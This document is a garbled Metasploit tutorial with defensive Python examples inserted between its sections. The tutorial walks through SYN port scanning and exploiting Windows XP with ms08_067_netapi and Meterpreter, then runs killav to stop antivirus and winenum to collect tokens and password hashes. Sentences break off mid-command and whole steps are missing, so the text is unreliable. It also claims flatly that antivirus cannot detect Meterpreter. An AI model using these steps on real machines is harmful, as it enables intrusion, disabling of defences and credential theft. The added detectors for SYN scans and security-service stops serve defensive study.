Introduction

The Metasploit Framework is a penetration testing framework that contains a lot of tools (port scanners, vulnerability scanners, exploits, etc.). Now we will start with the important step in penetration testing.

Information Gathering

The first and most important step in penetration testing is information gathering: collecting as much information as possible about a target. Your information must be accurate.
Information gathering is of 2 types:

1- Passive information gathering: collecting information without touching the target, like using
Scanning by Modules

Metasploit contains a lot of modules such as port scanners, banner grabbers for services, etc. We will use some of these modules here.
Note 1: To list the port scanner modules:

msf> search portscan

TCP-SYN scanning

To run a TCP-SYN port scan (syn), select the module with the use command:

msf> use auxiliary/scanner/portscan/syn
Then, to adjust this module's settings, use show options; you will see many options, and you can set any variable you want with the set command. For example, to set the IP address of the target:

set RHOST 192.
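From the defender's side, the SYN scan described above is easy to recognise: one source sends bare SYNs to many ports on a host and never completes the handshake. The following is an added example (not code from the original page or from Metasploit) that flags that pattern in constructed TCP flow records; the record layout, the host addresses and the port threshold are assumptions for the example.

```python
"""Spot SYN-scan-like behaviour in TCP flow records (defender's view).

A TCP-SYN scan sends a bare SYN to many ports and never finishes the
handshake, so on the target's side it appears as one source touching many
distinct destination ports with SYN-only flows and no established sessions.
Added example code, not part of Metasploit or the original page.
"""
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

# One flow record: (src_ip, dst_ip, dst_port, tcp_flags_seen, packet_count).
Flow = Tuple[str, str, int, str, int]

# Constructed sample flows (not captured from a real network). The scanner
# 10.0.0.5 sends single SYN packets to ports 20-34 of host 192.168.0.227;
# 10.0.0.9 is a normal client with completed handshakes plus one failed connect.
SAMPLE_FLOWS: List[Flow] = [
    ("10.0.0.5", "192.168.0.227", port, "S", 1) for port in range(20, 35)
] + [
    ("10.0.0.9", "192.168.0.227", 445, "SA", 40),
    ("10.0.0.9", "192.168.0.227", 139, "SA", 12),
    ("10.0.0.9", "192.168.0.227", 3389, "S", 1),
]


def is_syn_only(flags: str) -> bool:
    """True when the flow only ever carried SYN (no ACK), i.e. no handshake completed."""
    return "S" in flags and "A" not in flags


def detect_syn_scans(
    flows: Iterable[Flow], port_threshold: int = 10
) -> Dict[Tuple[str, str], List[int]]:
    """Return {(src, dst): sorted ports} for every source whose SYN-only flows
    touched at least port_threshold distinct ports on one destination host.
    The threshold is an assumed tuning value; adjust it for the environment."""
    touched: Dict[Tuple[str, str], set] = defaultdict(set)
    for src, dst, port, flags, _packets in flows:
        if is_syn_only(flags):
            touched[(src, dst)].add(port)
    return {
        pair: sorted(ports)
        for pair, ports in touched.items()
        if len(ports) >= port_threshold
    }


if __name__ == "__main__":
    for (src, dst), ports in detect_syn_scans(SAMPLE_FLOWS).items():
        print(f"possible SYN scan: {src} -> {dst}, {len(ports)} ports, first {ports[:5]}")
```

Run it as a script to list the suspicious source/destination pairs; in practice the flow records would come from a firewall, NetFlow or packet-capture export rather than the inline sample.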
Advanced Commands

Now we will introduce some advanced commands in Metasploit.

1- show exploits: Display all exploits available in Metasploit
msf> show exploits
2- show auxiliary: Display all auxiliary modules available in Metasploit (scanners, fuzzers, DoS tools, etc.)
msf> show auxiliary
3- show options: Display all the options available for a specific exploit, for example the ms03_026_dcom exploit
msf> show options
4- show payloads: Display the payloads that can be used with the current module, for example ms03_026_dcom
What is Meterpreter?

Meterpreter is a payload that uses an in-memory DLL injection technique, so antivirus software can't detect it, because Meterpreter writes nothing to disk. Meterpreter also uses encrypted communications.
Now let's try to hack a Windows machine (Windows XP) and set Meterpreter as the payload. First we will use the ms08_067_netapi exploit:
use exploit/windows/smb/ms08_067_netapi
Then we set the remote host (the victim):
set RHOST 192.168.0.227
Then we set Meterpreter as the payload:
9- checkvm: To check if the remote system is a virtual machine
run checkvm
The target system is actually a virtual machine running on VMware.
10- killav: To kill antivirus
run killav
11- windows enumeration: Collecting all information about the target machine such as username, running processes, tokens, network information, hardware information, groups, network routes, firewall configuration, password hashes, etc.
run winenum
As mentioned, the output is located in /root/.msf4/logs/scripts/winenum/BTRACK. To view the tokens
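The killav step (item 10 above) has a visible footprint on the target: the antivirus service stops, and the Service Control Manager records that in the Windows System log. The following is an added example (not code from the original page or from Metasploit) that scans constructed System-log lines for security services entering the stopped state (event 7036) or terminating unexpectedly (event 7034); the CSV-style export layout and the watchlist of service-name keywords are assumptions for the example.

```python
"""Flag stops of security-related Windows services in a System log export.

Added example code, not from the original page or Metasploit. Assumes the log
was exported as "<timestamp>,<EventID>,<Source>,<Message>" lines (constructed
layout); real exports will need their own column mapping.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample lines in the assumed export layout (sample data, not a real log).
SAMPLE_LOG = """\
2024-01-15T10:01:02Z,7036,Service Control Manager,The Print Spooler service entered the running state.
2024-01-15T10:02:10Z,7036,Service Control Manager,The Windows Defender Antivirus Service service entered the stopped state.
2024-01-15T10:02:11Z,7034,Service Control Manager,The Windows Defender Firewall service terminated unexpectedly.  It has done this 1 time(s).
2024-01-15T10:03:00Z,7036,Service Control Manager,The Windows Update service entered the running state.
2024-01-15T10:04:00Z,7036,Service Control Manager,The Windows Defender Antivirus Service service entered the running state.
"""

# Substrings that identify security services worth alerting on (assumption: tune to
# the products actually deployed). Compared case-insensitively.
WATCHLIST = ("defender", "antivirus", "firewall", "endpoint protection")

# Service Control Manager message shapes: "The X service entered the <state> state."
# and "The X service terminated unexpectedly." The name is matched non-greedily so
# that "Windows Defender Antivirus Service service ..." yields the full name.
STATE_RE = re.compile(
    r"^The (?P<svc>.+?) service (?:entered the (?P<state>\w+) state|terminated unexpectedly)"
)


@dataclass
class Alert:
    timestamp: str
    service: str
    state: str


def parse_line(line: str) -> Optional[Tuple[str, str, str]]:
    """Return (timestamp, service, state) for a service-state-change line, else None."""
    parts = line.split(",", 3)  # the message column may itself contain commas
    if len(parts) != 4:
        return None
    timestamp, event_id, source, message = parts
    if source != "Service Control Manager" or event_id not in ("7036", "7034"):
        return None
    match = STATE_RE.match(message)
    if not match:
        return None
    state = match.group("state") or "terminated"
    return timestamp, match.group("svc"), state


def find_security_service_stops(log_text: str) -> List[Alert]:
    """Collect every stop/termination of a watchlisted service, in log order."""
    alerts: List[Alert] = []
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        timestamp, service, state = parsed
        if state in ("stopped", "terminated") and any(
            keyword in service.lower() for keyword in WATCHLIST
        ):
            alerts.append(Alert(timestamp, service, state))
    return alerts


if __name__ == "__main__":
    for alert in find_security_service_stops(SAMPLE_LOG):
        print(f"{alert.timestamp} {alert.service!r} {alert.state}")
```

Only the stop and unexpected-termination events are reported; the later "entered the running state" line for the same service is parsed but not alerted on, so a restart does not mask the earlier stop.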